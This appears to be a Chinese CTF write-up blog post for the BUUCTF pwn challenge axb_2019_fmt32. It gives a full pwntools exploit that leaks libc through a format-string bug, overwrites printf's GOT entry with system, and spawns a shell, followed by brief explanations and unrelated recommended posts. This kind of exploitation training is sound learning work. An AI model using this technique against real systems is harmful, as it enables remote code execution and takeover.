关于”axb_2019_fmt32“的记录

最新推荐文章于 2025-06-18 14:24:29 发布
最新推荐文章于 2025-06-18 14:24:29 发布
阅读量177 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 二进制pwn学习 文章标签: linux c语言 stm32
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Probeginner/article/details/121707308

首先看exp:

from os import system
from pwn import*
p=remote('node4.buuoj.cn',29623)
elf=ELF('./fmt32')
libc=ELF('./libc-2.23.so')
printf_got=elf.got['printf']
paylaod1= b'a'+p32(printf_got)+ b'mm'+b'%8$s'
p.sendlineafter("me:",paylaod1)
p.recvuntil("mm")
addr_=u32(p.recv(4))
base = addr_-libc.symbols['printf']
system_=base + libc.symbols['system']

paylaod2=b'a'+fmtstr_payload(8,{printf_got:system_},numbwritten=0xa,write_size='byte')
p.sendline(paylaod2)

p.sendline(";/bin/sh\x00")
p.interactive()

值得注意的有这么几点:
1:paylaod1= b'a'+p32(printf_got)+ b'mm'+b'%8$s'这里第一个“a”是为了使数据上的栈对齐,从而使得后面往格式化字符串后第八个参数能够成功被输出。
2:paylaod2=b'a'+fmtstr_payload(8,{printf_got:system_},numbwritten=0xa,write_size='byte')这个fmtstr_payload的功能简单来说就是使偏移所在处的参数首先作为地址,而后将其指向的地方进行修改"{printf_got:system_}"就是在干这件事情。
具体细节请看这位师傅的

BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1651
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 995
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
axb_2019_fmt32
z1r0的博客
12-20 251
axb_2019_fmt32 查看保护 可以改got的格式化漏洞 测试一下偏移为8,差一个字符,所以payload前面加一个a即可。泄露出libc改printf_got为one_gadget fmtstr_payload中num参数为已经输出的字符个数,这里是0xa; from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r
buu axb_2019_fmt32 1
weixin_74861133的博客
03-24 379
程序大概的逻辑是先使用read函数向s读入最多0x100个字节,然后将s拼接在Repeater:后面再加一个\n后将其存入format里,然后输出format,s的大小为0x239,故不能栈溢出。而printf(format)这存在格式化字符串漏洞。而且该程序开启的只是Partial RELRO保护,所以每个libc函数对应的GOT表项是可以被修改的。
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 2073
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
BUUCTF【pwn】解题记录(1-3页已完结)
Assassin
05-05 2200
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
BUUCTF【axb_2019_fmt32
weixin_51055545的博客
04-25 2303
例行检查 是开 了部分relro,可以改写got表,然后栈不可执行不, IDA分析 很简单的一个程序,会先初始化一些后续要用到的栈空间,然后让我们输入,字节数大小会有限制,然后再对我们的输入做一个长度判断,长度符合的话就会调用printf()函数,存在格式化字符串漏洞,程序里没有system,binsh字符串,我们这里就要先leak出地址,然后返回system即可,观察程序不难发现,我们无法溢出去控制返回地址,然而我们可以去改 某一函数的got表地址为system,从而去get shell,通过分析,s
axb_2019_fmt32fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’))
weixin_61283545的博客
06-15 255
fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’) 第一个参数表示格式化字符串的偏移 第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress}; 第三个参数表示已经输出的字符个数 第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn
axb_2019_fmt32 wp
xia0ji233
06-08 520
title: axb_2019_fmt32 wp date: 2021-6-8 22:00:00 tags: write up format string comments: true categories: ctf pwn 临近期末考试了,终于可以光明正大地水博客了。 最近刚写上格式化字符串的漏洞,这不,他来了。这个题目我做过之后感觉难度还是有的,做出这一题至少对格式化字符串漏洞的利用是有一个较深的理解了的。它综合考察了ret2libc和格式化字符串的任意写,以及对got表的理解。 axb_20.
linux msyql8 允许远程连接
小妖666个人笔记
06-14 263
linux msyql8 允许远程连接
文件系统2(Linux下)
2401_83456040的博客
06-16 431
Linux文件系统中,inode不能跨分区,分区需挂载到目录才能使用。通过路径前缀可定位文件所在分区。硬链接(ln命令)是多个文件名映射同一inode,通过引用计数管理删除;目录因存在.和..默认引用计数为2,且禁止硬链接以避免环路。软链接(ln -s)则是独立文件,存储目标文件路径,用于快捷方式。软硬链接区别在于:硬链接共享inode,软链接为独立文件。
Linux 系统中比较常用的命令
最新发布
weixin_64916888的博客
06-18 249
💡 二、系统监控与资源查看。
Linux
yang_xiao_wu_的博客
06-13 1623
后面9个字母,每三个为一组,第一组代表当前用户权限、第二组代表当前组中其他用户权限、第三组代表其他组中用户权限。后面9个字母,每三个为一组,第一组代表当前用户权限、第二组代表当前组中其他用户权限、第三组代表其他组中用户权限。tar -zcvf 压缩包名称.tar.gz 文件1 文件2 文件夹1 文件夹2 创建压缩包。cd ../../../home 相对路径 .. 上一级目录 ../..rm -r 目录名/文件名 级联删除 可以用于删除带内容的目录。
ARM Linux下屏幕的显示旋转及触摸旋转
牧以南歌的博客
06-18 564
ARM Linux下屏幕的显示旋转及触摸旋转。
C语言Linux libc和glibc的历史
前进,才知道自己的渺小
06-15 472
libc用通常被用来指代标准C库的简称,即满足C语言标准的库,可供其他程序使用。但由于一些历史原因,它的概念出现了一些模糊,本文旨在帮助读者厘清这些概念。
云平台|Linux部分指令
qq_64392336的博客
06-14 484
1、阿里云(学生免费,不包流量 流量0.8---1G)2、腾讯云(抢)3、华为云 (2核2g2M 36 100G流量 2核2g3M 58 400G流量 )4、百度云(2核2g3M 38 没写流量)5、咸鱼(腾讯云38 4核4g3M 300G)
Linux make 指令详解
bjzhang75的博客
06-18 867
Linux make 指令详解
{"count": "AXB_MTWM_CALL_FINISH_RECORD_INFO", "query": {"result": "0", "baselineTime": {"$gte": 1740758400000, "$lt": 1740844800000}}}, 变成mongo查询语句
03-13
### 将JSON结构转换为MongoDB查询语句 要将给定的JSON结构转换为MongoDB查询语句,可以按照以下方式构建查询: #### 查询语句 假设集合名称为 `AXB_MTWM_CALL_FINISH_RECORD_INFO`,查询条件如下所示: ```javascript { "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z") } } ``` 完整的MongoDB查询语句可以通过 `db.collection.find()` 方法实现: ```javascript db.AXB_MTWM_CALL_FINISH_RECORD_INFO.find({ "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z") } }); ``` 此查询表示筛选出集合 `AXB_MTWM_CALL_FINISH_RECORD_INFO` 中满足以下两个条件的文档: 1. 字段 `result` 的值等于 `"0"`[^1]。 2. 字段 `baselineTime` 的值大于或等于 `ISODate("2025-01-28T00:00:00Z")` 并小于 `ISODate("2025-01-29T00:00:00Z")`[^2]。 如果需要进一步优化性能,可以在 `result` 和 `baselineTime` 上创建复合索引来加速查询操作。例如: ```javascript db.AXB_MTWM_CALL_FINISH_RECORD_INFO.createIndex({ result: 1, baselineTime: 1 }); ``` 这一步骤有助于提高查询效率,尤其是在处理大规模数据集时[^3]。 #### Java 实现示例 以下是基于 Java 驱动程序执行上述查询的一个示例代码片段: ```java import com.mongodb.client.MongoClients; import com.mongodb.client.MongoCollection; import com.mongodb.client.MongoDatabase; import org.bson.Document; public class MongoDBQueryExample { public static void main(String[] args) { try (var mongoClient = MongoClients.create("mongodb://localhost:27017")) { var database = mongoClient.getDatabase("your_database_name"); var collection = database.getCollection("AXB_MTWM_CALL_FINISH_RECORD_INFO"); Document query = new Document("result", "0") .append("baselineTime", new Document("$gte", java.time.Instant.parse("2025-01-28T00:00:00Z")) .append("$lt", java.time.Instant.parse("2025-01-29T00:00:00Z"))); collection.find(query).forEach(doc -> System.out.println(doc.toJson())); } } } ``` 这段代码展示了如何通过 Java API 构建并运行指定的查询逻辑[^4]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值